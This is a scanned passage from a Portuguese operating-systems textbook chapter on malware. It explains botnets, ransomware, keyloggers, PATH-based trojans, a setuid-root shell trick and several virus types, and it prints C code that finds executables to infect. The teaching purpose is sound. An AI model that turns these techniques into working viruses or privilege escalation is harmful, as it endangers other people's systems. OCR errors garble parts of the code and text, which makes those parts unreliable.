dólares de danos o malware causava e quantas pessoas 
perderam seus dados valiosos em consequência disso, 
os autores ficavam muito impressionados com suas 
habilidades de programação. Para eles era apenas uma 
brincadeira divertida; eles não estavam ganhando qual- 
quer dinheiro com isso, afinal de contas. 

Esses dias passaram. Malware hoje em dia é escri- 
to por demanda por criminosos bem organizados que 
preferem não ver seu trabalho publicado nos jornais. 
Eles não estão nessa inteiramente pelo dinheiro. Uma 
grande fração de todo o malware hoje é projetada para 
disseminar-se através da internet e infectar as máquinas 
das vítimas de uma maneira extremamente sutil. Quan- 
do uma máquina é infectada, um software é instalado e 
conta o endereço da máquina capturada de volta para 
determinadas máquinas. Uma porta dos fundos tam- 
bém é instalada na máquina e permite aos criminosos 
que enviaram o malware comandar facilmente a máqui- 
na para fazer o que ela é instruída a fazer. Uma máqui- 
na tomada dessa maneira é chamada de zumbi, e uma 
coleção delas é chamada de botnet, uma contração para 
“robot network — rede de robôs”. 

Um criminoso que controla uma botnet pode alugá- 
-la para varios fins mal-intencionados (e sempre comer- 
ciais). Um fim comum é enviar spams comerciais. Se 
ocorrer um importante ataque de spam e a polícia tentar 
rastrear a origem, tudo o que eles veem é que o ataque 
está vindo de milhares de máquinas mundo afora. Se 
eles abordam alguns dos proprietários dessas máquinas, 
descobrirão garotos, pequenos proprietários de negó- 
cios, donas de casa, avós e muitas outras pessoas, to- 
das elas negando vigorosamente que são os autores do 
spam. Usar as máquinas de outras pessoas para fazer o 
trabalho sujo torna dificil rastrear os criminosos por trás 
da operação. 

Uma vez instalado, o malware também pode ser 
usado para outros fins criminosos. A chantagem é uma 
possibilidade. Imagine um fragmento de malware que 
encripta todos os arquivos no disco rígido da vítima, 
então exibe a seguinte mensagem: 


SAUDAÇÕES DA GENERAL ENCRYPTION! 


PARA COMPRAR UMA CHAVE DE DECRIPTA- 
ÇÃO PARA SEU DISCO RÍGIDO, POR FAVOR EN- 
VIE US$ 100 EM NOTAS DE BAIXO VALOR, NÃO 
MARCADAS, PARAA CAIXA POSTAL 2154, PANA- 
MA CITY, PANAMÁ. OBRIGADO. TEMOS O MAIOR 
APREÇO POR SEU NEGÓCIO. 


Outra aplicação comum que o malware tem é a insta- 
lação de um registrador de teclas (keylogger) na máquina 
infectada. Esse programa apenas registra todas as teclas 
digitadas e periodicamente as envia para alguma maqui- 
na ou sequência de máquinas (incluindo zumbis) para a 
entrega final para o criminoso. Conseguir que o provedor 
de internet servindo a máquina de entrega coopere em 
uma investigação é muitas vezes difícil, pois muitas delas 
estão envolvidas com (ou são de propriedade) o crimino- 
so, especialmente em países onde a corrupção é comum. 

O ouro a ser prospectado nessas teclas digitadas con- 
siste em números de cartão de crédito, que podem ser 
usados para comprar bens de negócios legítimos. Tendo 
em vista que as vítimas não fazem ideia de que os seus 
números de cartão de crédito foram roubados até rece- 
berem suas contas ao final de um ciclo de cobrança, os 
criminosos podem seguir em frente gastando para valer 
por dias, possivelmente até semanas. 

Para se proteger desses ataques, todas as companhias 
de cartão de crédito usam softwares de inteligência ar- 
tificial para detectar padrões de gastos peculiares. Por 
exemplo, se uma pessoa que em geral só usa o cartão de 
crédito em lojas locais subitamente pede uma dúzia 
de notebooks caros para serem entregues em um ende- 
reço no Tajiquistão, por exemplo, um alarme começa a 
soar na empresa de cartões de crédito e um empregado 
liga para o dono do cartão para perguntar educadamente 
sobre a transação. É claro, os criminosos sabem sobre 
esse software, então eles tentam adequar seus hábitos de 
gastos para não chamar muito a atenção. 

Os dados coletados pelo registrador de teclas podem 
ser combinados com outros dados coletados por softwa- 
res instalados no zumbi para permitir que o criminoso se 
engaje em um roubo de identidade mais amplo. Nesse 
crime, o criminoso coleta dados suficientes sobre uma 
pessoa, como a data de nascimento, nome de solteira 
da mãe, número do seguro social, números das contas 
bancárias, senhas e assim por diante, para ser capaz de 
assumir com sucesso a identidade da vítima e conseguir 
novos documentos físicos, como uma nova carteira de 
motorista, cartão do banco, certidão de nascimento e 
mais. Esses por sua vez podem ser vendidos para outros 
criminosos para serem explorados futuramente. 
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Outra forma de crime que alguns malwares cometem 
é manter-se sem chamar a atenção até o usuário conectar- 
-se corretamente à sua conta de banco na internet. Então 
ele rapidamente executa uma transação para ver quanto 
dinheiro há na conta e transfere logo tudo para a conta 
do criminoso, da qual ele é imediatamente transferido 
para outra conta e então outra e outra (tudo em diferen- 
tes países corruptos) de maneira que a polícia precise de 
dias ou semanas para conseguir todas as autorizações de 
busca necessárias para seguir o dinheiro e que talvez não 
consiga ser recuperado nem que ela chegue a ele. Esses 
tipos de crimes são um grande negócio; não se trata mais 
de adolescentes sem ter o que fazer. 

Além do seu uso pelo crime organizado, o malware 
também tem aplicações industriais. Uma empresa pode 
lançar um malware que confere se ele está executando 
na fábrica de uma rival e sem um administrador de sis- 
tema atualmente conectado. Se o terreno estiver limpo, 
ela interfere com o processo de produção, reduzindo a 
qualidade do produto, desse modo causando problemas 
para o competidor. Em todos os outros casos ela não 
faria nada, tornando difícil sua detecção. 

Outro exemplo de malware direcionado é um pro- 
grama que poderia ser escrito por um vice-presidente 
corporativo ambicioso e liberado na LAN local. O vírus 
conferiria se ele está executando na máquina do presiden- 
te, e se a resposta for afirmativa, procuraria uma planilha 
e trocaria suas células aleatoriamente. Fatalmente um dia 
o presidente tomaria uma má decisão baseada na saída 
da planilha e talvez seria despedido como consequência 
disso, abrindo uma posição para você-sabe-quem. 

Algumas pessoas andam por aí o dia inteiro com um 
chip sobre os ombros (não confundir com pessoas que 
andam com um chip RFID — Radio Frequency Identi- 
fication, ou identificação por radiofrequência — dentro 
do ombro). Elas podem ter algum rancor real ou ima- 
ginário contra o mundo e querem vingar-se. Malwares 
podem ajudar. Muitos computadores modernos contêm 
o BIOS na memória flash, que pode ser reescrita sob 
o controle de um programa (para permitir que o fabri- 
cante distribua correções de erros eletronicamente). 
O malware pode gravar um lixo aleatório na memória 
flash de maneira que o computador não poderá mais ser 
inicializado. Se o chip de memória flash estiver em um 
soquete, consertar o problema exige abrir o computador 
e substituir o chip. Se o chip de memória flash estiver 
soldado na placa-mãe, provavelmente a placa inteira 
terá de ser jogada fora, e uma nova, comprada. 

Poderíamos continuar por horas, mas você provavel- 
mente entendeu a questão. Se quiser mais histórias de 
horror, apenas digite malware em qualquer mecanismo 
de busca. Receberá dezenas de milhões de respostas. 
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Uma pergunta que muitas pessoas fazem é: “Por que 
o malware se dissemina tão facilmente”. Há várias 
razões. Primeiro, algo como 90% dos computadores 
pessoais do mundo executam (versões de) um único sis- 
tema operacional, Windows, o que os torna um alvo fá- 
cil. Se existissem 10 sistemas operacionais por aí, com 
10% do mercado, disseminar um malware seria bem 
mais difícil. Como no mundo biológico, a diversidade 
é uma boa defesa. 

Em segundo lugar, desde os seus primeiros dias, a 
Microsoft colocou uma ênfase enorme sobre tornar o 
Windows fácil para pessoas não técnicas. Por exemplo, 
no passado, os sistemas Windows eram normalmente 
configurados para permitir o login sem uma senha, en- 
quanto os sistemas UNIX historicamente sempre exi- 
giram uma senha (embora essa prática excelente esteja 
enfraquecendo à medida que o Linux tenta tornar-se 
mais parecido com o Windows). Em uma série de outras 
maneiras existem escolhas a serem feitas entre ter uma 
boa escolha ou a facilidade de uso, e a Microsoft con- 
sistentemente escolheu a facilidade de uso como uma 
estratégia de marketing. Se você acredita que a seguran- 
ça é mais importante do que a facilidade de uso, pare de 
ler agora e configure o seu telefone celular para exigir 
um código PIN antes que você vá fazer uma chama- 
da — quase todos eles são capazes disso. Se você não 
sabe como, apenas baixe o manual do usuário do site do 
fabricante. 

Nas próximas seções examinaremos as formas mais 
comuns de malware, como eles são construídos e como 
são disseminados. Mais tarde no capítulo, examinare- 
mos algumas maneiras como nos defendermos deles. 


9.9.1 Cavalos de Troia 


Escrever um malware é uma coisa. Você pode fazê- 
-lo no seu quarto. Conseguir milhões de pessoas para 
instalá-lo em seus computadores é algo bem diferente. 
Como o nosso escritor de malware, Mal, conseguiu 
isso? Uma prática muito comum é escrever algum pro- 
grama genuinamente útil e embutir o malware dentro 
dele. Jogos, tocadores de música, visualizadores “es- 
peciais” de pornografia e qualquer coisa com gráficos 
atraentes são bons candidatos. As pessoas vão então 
baixá-lo voluntariamente e instalar a aplicação. Como 
bônus gratuito, elas têm um malware instalado, também. 
Essa abordagem é chamada de ataque por cavalo de 
Troia, em alusão ao cavalo de madeira cheio de solda- 
dos gregos descrito na Odisseia de Homero. No mundo 


da segurança de computadores, ele passou a significar 
qualquer malware escondido no software ou em uma 
página da web que as pessoas baixam voluntariamente. 

Quando o programa gratuito é inicializado, ele 
chama uma função que escreve o malware para o dis- 
co como um programa executável e o inicializa. O 
malware pode então fazer o dano que quiser para o qual 
ele foi projetado, como apagar, modificar e criptografar 
arquivos. Ele pode também buscar números de cartões 
de crédito, senhas e outros dados úteis e enviá-los de 
volta para Mal pela internet. De maneira mais provável, 
ele se anexa a alguma porta de IP e espera ali por orien- 
tações, tornando a máquina um zumbi, pronto para en- 
viar spam e fazer o que quer que o mestre remoto queira. 
Normalmente, o malware também invocará os coman- 
dos necessários para certificar-se de que ele seja reini- 
ciado sempre que a máquina for reinicializada. Todos os 
sistemas operacionais têm uma maneira de fazer isso. 

A beleza do ataque do cavalo de Troia é que ele não 
exige que o autor viole o computador da vítima. A pró- 
pria vítima faz todo o trabalho. 

Há também outras maneiras para enganar a vítima 
para fazê-la executar o programa do cavalo de Troia. 
Por exemplo, muitos usuários UNIX têm uma variável 
de ambiente, $PATH, que controla quais diretórios são 
pesquisados por um comando. Ele pode ser visto digi- 
tando o seguinte comando para o shell: 


echo $PATH 


Uma configuração potencial para o usuario ast em 
um sistema em particular pode consistir dos seguintes 
diretórios: 

/usr/ast/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/ 

usr/ucb:/usr/man\ 


:/usr/java/bin:/usr/java/lib:/usr/local/man:/usr/ 
openwin/man 


E possivel que outros usuarios tenham um caminho 
de busca diferente. Quando o usuario digita 


prog 

para o shell, o shell primeiro confere para ver se ha um 
programa no local /usr/ast/bin/prog. Se há, ele é executa- 
do. Se não há, o shell tenta /usr/local/bin/prog, /usr/bin/ 
prog, /bin/prog, e assim por diante, tentando todos os 10 
diretórios por sua vez antes de desistir. Suponha que ape- 
nas um desses diretórios foi deixado desprotegido e um 
cracker colocou um programa ali. Se essa é a primeira 
ocorrência do programa na lista, ele será executado e o 
cavalo de Troia executará. 


Amaioria dos programas comuns é em /bin ou /usr/bin, 
então colocar um cavalo de Troia em /usr/bin/X11/Is não 
funciona para um programa comum, pois o programa 
real será encontrado primeiro. Contudo, suponha que o 
cracker insira la em /usr/bin/X11. Se um usuário digita 
errado la em vez de /s (o programa de listagem do di- 
retório), agora o cavalo de Troia executará, fará o seu 
trabalho sujo e então emitirá a mensagem correta que 
la não existe. Ao inserir cavalos de Troia em diretórios 
complicados que dificilmente alguém se interessa em 
ver e dar a eles nomes que poderiam representar erros 
de digitação comuns, há uma boa chance de que al- 
guém os invocará um dia. E esse alguém pode ser um 
superusuário (mesmo superusuários cometem erros 
de digitação), nesse caso o cavalo de Troia tem agora 
a oportunidade de substituir /bin/ls por uma versão 
contendo um cavalo de Troia, então ele será invocado 
a qualquer momento. 

Nosso usuário mal-intencionado, mas cadastrado, 
Mal, também poderia colocar uma armadilha para o su- 
perusuário como a seguir. Ele coloca uma versão de /s 
contendo um cavalo de Troia no seu próprio diretório e 
então faz algo suspeito que certamente atrairá a atenção 
do superusuário, como inicializar 100 processos com 
uso intensivo da CPU ao mesmo tempo. As chances são 
de que o superusuário conferirá isso digitando 


cd /home/mal 
Is -l 


para ver o que Mal tem em seu diretório local. Tendo 
em vista que alguns shells primeiro tentam o diretório 
local antes de trabalhar através do $PATH, o superu- 
suário pode ter simplesmente invocado o cavalo de 
Troia de Mal com o poder do superusuário. O cava- 
lo de Troia poderia então executar /home/mal/bin/sh 
com SETUID de root. Tudo o que ele precisa são duas 
chamadas de sistema: chown para mudar o proprietá- 
rio de /home/mal/bin/sh para root e chmod para confi- 
gurar seu bit SETUID. Agora, Mal pode tornar-se um 
superusuário quando quiser, simplesmente executando 
aquele shell. 

Se Mal se vê seguidamente com falta de dinheiro, 
ele poderia usar um dos golpes de cavalo de Troia a se- 
guir para ajudar sua posição de liquidez. No primeiro, 
o cavalo de Troia confere para ver se a vítima tem um 
programa de banking on-line instalado. Se afirmativo, o 
cavalo de Troia dirige o programa para transferir algum 
dinheiro da conta da vítima para uma conta de fachada 
(preferivelmente em um país distante) para retirar em 
dinheiro mais tarde. De maneira semelhante, se o cava- 
lo de Troia executa em um telefone móvel (smartphone 
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ou não), ele também poderá enviar mensagens de texto 
para números com um custo realmente alto, de prefe- 
rência mais uma vez em um país distante, como a Mol- 
dávia (parte da ex-União Soviética). 


9.9.2 Vírus 


Nesta seção, examinaremos os vírus; depois deles, 
iremos para os worms (vermes). A internet também está 
cheia de informações sobre vírus. Além disso, é difícil 
para as pessoas se defenderem contra os vírus se elas 
não sabem como eles funcionam. Por fim, há uma série 
de entendimentos equivocados a respeito de vírus que 
precisam ser corrigidos. 

O que é um vírus mesmo? Resumindo uma longa 
história, um vírus é um programa que pode reproduzir- 
-se anexando o seu código a outro programa, de manei- 
ra análoga à reprodução dos vírus biológicos. O vírus 
também pode fazer outras coisas além de reproduzir-se. 
Vermes são como vírus, mas se autoreproduzem. Essa 
diferença não vai nos preocupar por ora, então usare- 
mos o termo “virus” para cobrir ambos os casos. Exa- 
minaremos os vermes na Seção 9.9.3. 


Como os vírus funcionam 


Vamos ver agora quais os tipos de vírus que exis- 
tem e como eles funcionam. O escritor do vírus, vamos 
chamá-lo de Virgil, provavelmente trabalha em lingua- 
gem assembly (ou talvez C) para conseguir um produto 
pequeno e eficiente. Após ter escrito o seu vírus, ele o 
insere em um programa na sua própria máquina. Esse 
programa infectado é então distribuído, talvez postan- 
do-o em uma coleção de softwares gratuitos na internet. 
O programa pode ser um jogo novo empolgante, uma 
versão pirateada de algum software comercial, ou qual- 
quer coisa mais com uma boa chance de ser considerada 
desejável. As pessoas começam então a baixar o progra- 
ma infectado. 

Uma vez instalado na máquina da vítima, o vírus fica 
dormente até o programa infectado ser executado. Uma 
vez inicializado, ele começa infectando outros progra- 
mas na máquina e então executando sua carga útil. Em 
muitos casos, a carga útil pode não fazer nada até uma 
determinada data ter passado para ter certeza de que o 
vírus tenha se disseminado bastante antes que as pes- 
soas percebam. A data escolhida pode até enviar uma 
mensagem política (por exemplo, se ele for acionado no 
100º ou 500º aniversário de um grave insulto ao grupo 
étnico do autor). 


460] | SISTEMAS OPERACIONAIS MODERNOS 


Na discussão a seguir, examinaremos sete tipos de 
virus baseados no que esta infectado. Esses sao os virus 
companheiros, de programa executavel, de memoria, de 
setor de inicialização, de unidade de dispositivo e de 
código fonte. Não há dúvida de que novos tipos apare- 
cerão no futuro. 


Vírus companheiro 


Um vírus companheiro não infecta de fato um pro- 
grama, mas é executado quando o programa for exe- 
cutado. Eles são realmente antigos, da época em que 
o MS-DOS mandava no mundo, mas ainda existem. O 
conceito é mais fácil de explicar com um exemplo. No 
MS-DOS quando um usuário digita 


prog 


o MS-DOS primeiro procura por um programa chama- 
do prog.com. Se não puder encontrar um, ele procura- 
rá por um programa chamado prog.exe. No Windows, 
quando um usuário clica em Start e então em Run (ou 
pressiona a tecla Windows e então “R”), a mesma coisa 
acontece. Hoje em dia, a maioria dos programas são ar- 
quivos .exe; arquivos .com são muito raros. 


Suponha que Virgil saiba que muitas pessoas execu- 
tam prog.exe de um prompt MS-DOS ou do Executar 
em Windows. Ele pode então simplesmente liberar um 
vírus chamado prog.com, que será executado quando 
uma pessoa tentar executar prog (a não ser que ele re- 
almente digite o nome inteiro: prog.exe). Quando prog. 
com terminar o seu trabalho, ele então simplesmente 
executa prog.exe e o usuário nem fica sabendo. 

Um ataque de certa maneira relacionado usa a área 
de trabalho (desktop) do Windows, que contém atalhos 
(links simbólicos) para programas. Um vírus pode mu- 
dar o alvo de um atalho para fazê-lo apontar para o vi- 
rus. Quando o usuário clica duas vezes sobre um ícone, 
o vírus é executado. Quando isso é feito, o vírus sim- 
plesmente executa o programa original do atalho. 


Vírus de programas executáveis 


Um passo adiante na complexidade dos vírus e 
encontramos os vírus que infectam programas exe- 
cutáveis. O mais simples desse tipo de vírus apenas 
sobrescreve o programa executável com ele mes- 
mo. Esses são chamados de vírus de sobreposição 
(overwriting). A lógica de infecção desses vírus é dada 
na Figura 9.28. 


KEUTER] Um procedimento recursivo que encontra arquivos executáveis em um sistema UNIX. 


#include <sys/types.h> 
#include <sys/stat.h> 
#include <dirent.h> 
#include <fentl.h> 
#include <unistd.h> 
struct stat sbuf; 


search(char *dir_name) 
{ 

DIR *dirp; 

struct dirent *dp; 


dirp = opendir(dir_name); 
if (dirp == NULL) return; 
while (TRUE) { 
dp = readdir(dirp); 
if (dp == NULL) { 


chdir (".."); 
break; 
} 
if (dp->d_name[0] == '.') continue; 


Istat(dp->d name, &sbuf); 
if (S ISLNK(sbuf.st mode)) continue; 
if(chdir(dp->d name) == 0) { 
search("."); 
}else { 
if (access(dp->d_name, X_OK) == 0) 
infect(dp->d name); 


> 
closedir(dirp); 


/* cabecalhos-padrao POSIX */ 


/* para a chamada Istat veja se o arquivo e uma ligacao simb. */ 


/* busca recursivamente por executaveis */ 
/* ponteiro para um fluxo de diretorio aberto */ 
/* ponteiro para uma entrada de diretorio */ 


/* abrir este diretorio */ 
/* se dir nao puder ser aberto, esqueca-o */ 


/* leia a proxima entrada de diretorio */ 
/* NULL significa que terminamos */ 

/* volte ao diretorio-pai */ 

/* sai do laco */ 


/* salte os diretorios . e .. */ 

/* a entrada e uma ligacao simbolica? */ 

/* salte as ligacoes simbolicas */ 

/* se chdir tiver sucesso, deve ser um diretorio */ 
/* sim, entre e busque-o */ 

/* nao (arquivo), infecte-o */ 

/* se for executavel, infecte-o */ 


/* diretorio processado; feche e retorne */ 


O programa principal desse vírus primeiro copiaria 
o seu programa binário em um arranjo abrindo argv[0] 
e lendo-o para mantê-lo em lugar seguro. Então ele per- 
correria o sistema de arquivos inteiro começando no 
diretório raiz ao modificar para ele e chamando search 
com o diretório raiz como parâmetro. 

O procedimento recursivo search processa um dire- 
tório abrindo-o, então lendo as entradas uma de cada 
vez usando readdir até que NULL seja retornado, indi- 
cando que não há mais entradas. Se a entrada é um di- 
retório, ela é processada alterando o diretório atual para 
essa nova entrada e então chamando search recursiva- 
mente; se ela for um arquivo executável, ela é infectada 
ao chamar infect com o nome do arquivo para infectar 
como um parâmetro. Arquivos começando com “.” são 
pulados para evitar problemas com os diretórios . e .. . 
Também, links simbólicos são pulados porque o progra- 
ma presume que ele pode entrar em um diretório usando 
a chamada de sistema chdir e então voltar para onde ele 
estava indo para .. , algo que é assegurado para links 
rígidos, mas não simbólicos. Um programa mais bacana 
poderia lidar com links simbólicos, também. 

O procedimento de infecção real, infect (não mos- 
trado), meramente tem de abrir o arquivo nomeado no 
seu parâmetro, copiar o vírus salvo no arranjo sobre o 
arquivo e então fechá-lo. 

Esse vírus poderia ser “melhorado” de várias manei- 
ras. Primeiro, um teste poderia ser inserido em infect 
para gerar um número aleatório e apenas retornar na 
maioria dos casos sem fazer nada. Em, digamos, uma 
chamada a cada 128, a infecção ocorreria, desse modo 
reduzindo as chances de uma detecção prematura, antes 
que o vírus tivesse uma boa chance de se disseminar. 
Vírus biológicos têm a mesma propriedade: os que ma- 
tam suas vítimas rapidamente não se disseminam nem 
de perto tão rápido quanto aqueles que produzem uma 
morte lenta e arrastada, dando às vítimas todo o tempo 
para disseminar o vírus. Um projeto alternativo seria 
uma taxa de infecção mais alta (digamos, 25%), mas 
um corte no número de arquivos infectados ao mesmo 
tempo reduz a atividade do disco e desse modo é menos 
suspeito. 

Em segundo lugar, infect poderia verificar para 
ver se o arquivo já está infectado. Infectar o mesmo 
arquivo duas vezes apenas desperdiça tempo. Ter- 
ceiro, medidas poderiam ser tomadas para manter o 
tempo da última modificação e o tamanho do arqui- 
vo os mesmos, uma vez que isso ajuda a esconder 
a infecção. Para programas maiores do que o vírus, 
o tamanho permanecerá o mesmo, mas para progra- 
mas menores que o vírus. Como a maioria dos vírus 
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é menor do que a maioria dos programas, esse não é 
um problema sério. 

Embora esse programa inteiro não seja muito lon- 
go (o programa completo está sob uma página de C 
e o segmento de texto compila para menos de 2 KB), 
uma versão dele em código assembly seria mais curta 
ainda. Ludwig (1998) criou um programa de código 
assembly para o MS-DOS que infecta todos os ar- 
quivos no diretório e tem apenas 44 bytes depois de 
montado. 

Mais à frente neste capítulo estudaremos programas 
antivírus, isto é, programas que rastreiam e removem 
vírus. É interessante observar que a lógica da Figura 
9.28, que um vírus poderia usar para encontrar todos os 
arquivos executáveis para infeccioná-los, também po- 
deria ser usada por um programa antivírus para rastrear 
todos os programas infectados a fim de remover o vi- 
rus. As tecnologias de infecção e desinfecção andam de 
mãos dadas, razão pela qual é necessário compreender 
em detalhes como os vírus funcionam a fim de ser capaz 
de combatê-los efetivamente. 

Do ponto de vista de Virgil, o problema com um vi- 
rus de sobreposição é que ele é fácil de detectar. Afinal 
de contas, quando um programa infectado executa, ele 
pode disseminar o vírus um pouco mais, mas ele não 
faz o que deve fazer, e o usuário notará isso instantanea- 
mente. Em consequência, muitos vírus se anexam ao 
programa e fazem o seu trabalho sujo, mas permitem 
que o programa funcione normalmente depois disso. 
Tais vírus são chamados de vírus parasitas. 

Vírus parasitas podem ligar-se na frente, no fim ou 
no meio de um programa executável. Se um vírus se 
anexar do início, ele tem de primeiro copiar o progra- 
ma para a RAM, colocar-se na frente e então copiá-lo 
de volta da RAM após si mesmo, como mostrado na 
Figura 9.29(b). Infelizmente, o programa não vai exe- 
cutar no seu novo endereço virtual, então o vírus tem 
de realocar o programa à medida que ele é movido ou 
movê-lo para o endereço virtual O após terminar a sua 
própria execução. 

Para evitar qualquer uma das opções complexas exi- 
gidas ao se carregar no início, a maioria dos vírus se 
carrega no fim, anexando-se ao fim de um programa 
executável em vez da frente, mudando o campo de en- 
dereço de partida no cabeçalho para apontar para o iní- 
cio do vírus, como ilustrado na Figura 9.29(c). O vírus 
executará agora em um diferente endereço virtual de- 
pendendo de qual programa infectado está executando, 
mas tudo isso significa que Virgil tem de certificar-se 
de que o seu vírus está em uma posição independente, 
usando endereços relativos em vez de absolutos. Isso 
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KELER] (a) Um programa executável. (b) Com um vírus na frente. (c) Com um vírus no fim. (d) Com um vírus espalhado pelos 


espaços livres ao longo do programa. 


Programa 
executável 


Programa 
executável 


Endereço 
de início 


Cabeçalho 


Cabeçalho 


não é difícil para um programador experiente fazer e al- 
guns compiladores podem fazê-lo mediante solicitação. 

Formatos de programa executável de texto, como 
arquivos .exe no Windows e quase em todos os for- 
matos binários UNIX modernos, permitem que um 
programa tenha múltiplos segmentos de dados e tex- 
to, com o carregador montando-os na memória e rea- 
lizando a realocação durante a execução. Em alguns 
sistemas (Windows, por exemplo), todos os segmen- 
tos (seções) são múltiplos de 512 bytes. Se um seg- 
mento não está cheio, o linker o enche com Os. Um 
vírus que compreende isso pode tentar esconder-se 
nesses espaços. Se ele se encaixar inteiramente, como 
na Figura 9.29(d), o tamanho do arquivo permanece 
o mesmo que aquele do arquivo não infectado, cla- 
ramente uma vantagem, já que um vírus escondido é 
feliz. Vírus que usam esse princípio são chamados de 
vírus de cavidade. É claro, se o carregador não carre- 
gar as áreas de cavidade na memória, o vírus precisará 
de outra maneira para ser inicializado. 


Vírus residentes na memória 


Até o momento presumimos que quando um pro- 
grama infectado é executado, o vírus executa, passa 
o controle para o programa real e então sai. Em com- 
paração, um vírus residente na memória permanece 
na memória (RAM) o tempo inteiro, seja esconden- 
do-se bem no topo da memória ou talvez na parte 
mais baixa entre os vetores de interrupção, cujas úl- 
timas centenas de bytes geralmente não são usadas. 





Programa 
executável 





Um vírus muito inteligente pode até modificar o 
mapa de bits da RAM do sistema para fazê-lo acre- 
ditar que a memória do vírus está ocupada, a fim de 
evitar o incômodo de ser sobrescrito. 

Um típico vírus residente na memória captura um 
dos vetores de instrução de desvio ou interrupção co- 
piando o conteúdo para uma variável de rascunho e 
colocando-o no seu próprio endereço ali, desse modo 
direcionando aquele desvio ou interrupção para ele. A 
melhor escolha é o desvio de chamada de sistema. Des- 
sa maneira, o vírus é executado (em modo núcleo) em 
cada chamada de sistema. Quando isso é feito, ele sim- 
plesmente invoca a chamada de sistema real saltando 
para o endereço de desvio salvo. 

Por que um vírus iria querer executar em toda cha- 
mada de sistema? Para infectar programas, naturalmen- 
te. O vírus pode apenas esperar até que a chamada de 
sistema exec apareça e, então, sabendo que o arquivo 
à mão é um binário executável (e provavelmente um 
binário útil quanto a isso), infectá-lo. Esse processo não 
exige a atividade de disco maciça da Figura 9.28, então 
ele é muito menos visível. Capturar todas as chama- 
das de sistema também dá ao vírus um grande poten- 
cial para espionar os dados e realizar toda sorte de atos 
mal-intencionados. 


Vírus do setor de inicialização 


Como discutimos no Capítulo 5, quando a maio- 
ria dos computadores está ligada, o BIOS lê o regis- 
tro principal de inicialização do começo do disco de 


inicialização na RAM e o executa. Esse programa de- 
termina qual partição está ativa e lê o primeiro setor, 
o de inicialização, daquela partição e a executa. Esse 
programa carrega o sistema operacional ou traz um 
carregador para carregá-lo. Infelizmente, há muitos 
anos atrás um dos amigos de Virgil teve a ideia de 
criar um vírus que pudesse sobrescrever o registro 
principal de inicialização ou o setor de inicialização, 
com resultados devastadores. Esses vírus, chamados 
de vírus de setor de inicialização, ainda são muito 
comuns. 

Normalmente, um vírus do setor de inicialização 
[que inclui vírus de MBR (Master Boot Record — re- 
gistro principal de inicialização)] primeiro copia o ver- 
dadeiro setor de inicialização para um lugar seguro no 
disco de maneira que ele possa inicializar o sistema 
operacional quando ele tiver terminado. O programa de 
formatação de disco da Microsoft, fdisk, pula a primei- 
ra trilha, de maneira que ela é um bom lugar para se 
esconder nas máquinas Windows. Outra opção é usar 
qualquer setor de disco livre e então atualizar a lista de 
setores ruins para marcar o esconderijo como defeitu- 
oso. Na realidade, se o vírus for grande, ele também 
pode disfarçar o resto de si como setores defeituosos. 
Um vírus realmente agressivo poderia até simplesmente 
alocar espaço de disco normal para o verdadeiro setor 
de inicialização e para si mesmo, e atualizar o mapa de 
bits do disco ou lista livre conformemente. Fazer isso 
exige um conhecimento íntimo das estruturas de dados 
internas do sistema operacional, mas Virgil tinha um 
bom professor para o seu curso de sistemas operacio- 
nais e estudava com afinco. 

Quando o computador é inicializado, o vírus copia a 
si mesmo para a RAM, seja na parte de cima ou na parte 
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de baixo entre os vetores de interrupção não utilizados. 
Nesse ponto, a máquina está no modo núcleo, com o 
MMU desligado, sem sistema operacional e sem ne- 
nhum programa antivírus executando. Quando ele está 
pronto, ele inicializa o sistema operacional, normal- 
mente permanecendo residente na memória de maneira 
que ele possa manter um olho nas coisas. 

Um problema, no entanto, é como retomar o con- 
trole novamente mais tarde. A maneira usual é explorar 
um conhecimento específico de como o sistema opera- 
cional gerencia vetores de interrupção. Por exemplo, o 
Windows não sobrescreve todos os vetores de interrup- 
ção em um golpe. Em vez disso, ele carrega as unidades 
do dispositivo, uma de cada vez, e cada uma captura o 
vetor de interrupção de que precisa. Esse processo pode 
levar um minuto. 

Esse projeto dá ao vírus os instrumentos de que ele 
precisa para seguir em frente. Ele começa capturando 
todos os vetores de interrupção, como mostrado na Fi- 
gura 9.30(a). À medida que os drivers são carregados, 
alguns dos vetores são sobrescritos, mas a não ser que 
o driver do relógio seja carregado primeiro, haverá um 
número suficiente de interrupções de relógio mais tarde 
que inicializam o vírus. A perda da interrupção de im- 
pressora é mostrada na Figura 9.30(b). Tão logo o vírus 
vê que um dos seus vetores de interrupção foi sobrescri- 
to, ele pode sobrescrever aquele vetor novamente, sa- 
bendo que agora é seguro (na realidade, alguns vetores 
de interrupção são sobrescritos várias vezes durante a 
inicialização, mas o padrão é determinístico e Virgil o 
conhece de cor). A recaptura da impressora é mostrada 
na Figura 9.30(c). Quando tudo está carregado, o ví- 
rus restaura todos os vetores de interrupção e mantém 
apenas o vetor da chamada de sistema que desvia o 


e TEE (a) Após o vírus ter capturado todos os vetores de interrupção de hardware e software. (b) Após o sistema operacional 
ter retomado o vetor de interrupção da impressora. (c) Após o vírus ter percebido a perda do vetor de interrupção da 


impressora e recapturá-lo. 
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controle para si. A essa altura, temos um virus residente 
na memoria em controle das chamadas de sistema. Na 
realidade, é assim que a maioria dos virus residentes na 
memoria comega na vida. 


Virus de driver de dispositivo 


Entrar na memória dessa maneira é um pouco como 
a espeleologia (exploração de cavernas) — você precisa 
contorcer-se e seguir atento para que nada caia na sua 
cabeça. Seria muito mais simples se o sistema operacio- 
nal simplesmente carregasse de forma gentil o vírus ofi- 
cialmente. Com um pouco de trabalho, essa meta pode 
ser alcançada. O truque é infectar um driver de disposi- 
tivo, levando a um vírus de driver de dispositivo. No 
Windows e em alguns sistemas UNIX, drivers de dispo- 
sitivo são apenas programas executáveis que vivem no 
disco e são carregados no momento da execução. Se um 
deles puder ser infectado, o vírus será sempre carregado 
oficialmente no momento da inicialização. Melhor ain- 
da, drivers executam em modo núcleo, e após o driver 
ter sido carregado, ele é chamado, dando ao vírus uma 
chance de capturar o vetor de desvio de chamada do sis- 
tema. Esse fato somente é realmente um forte argumento 
para executar os drivers de dispositivo como programas 
no modo usuário (como MINIX 3 faz) — porque se eles 
forem infectados, não serão capazes de causar nem de 
perto os danos de drivers do modo núcleo. 


Vírus macros 


Muitos programas, como Word e Excel, permitem 
que os usuários escrevam macros para agrupar diversos 
comandos que mais tarde podem ser executados com 
uma única tecla digitada. Macros também podem ser 
anexados a itens de menus, de maneira que, quando um 
deles é selecionado, o macro é executado. No Office, 
macros podem conter programas inteiros em Visual Ba- 
sic, que é uma linguagem de programação completa. Os 
